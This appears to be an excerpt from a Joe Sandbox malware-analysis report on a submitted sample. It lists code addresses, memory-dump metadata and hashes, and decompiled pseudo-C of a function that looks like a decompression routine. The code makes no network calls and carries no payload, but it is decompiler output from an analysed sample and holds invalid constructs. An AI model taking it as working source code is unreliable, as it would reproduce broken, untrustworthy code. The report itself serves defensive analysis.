                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x00000000
                    0x004075cf
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00407441
                    0x00407441
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x00000000
                    0x00406dec
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00000000
                    0x00407482
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x00000000
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x004075e5
                    0x004075eb
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00407524
                    0x00000000
                    0x00407399

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
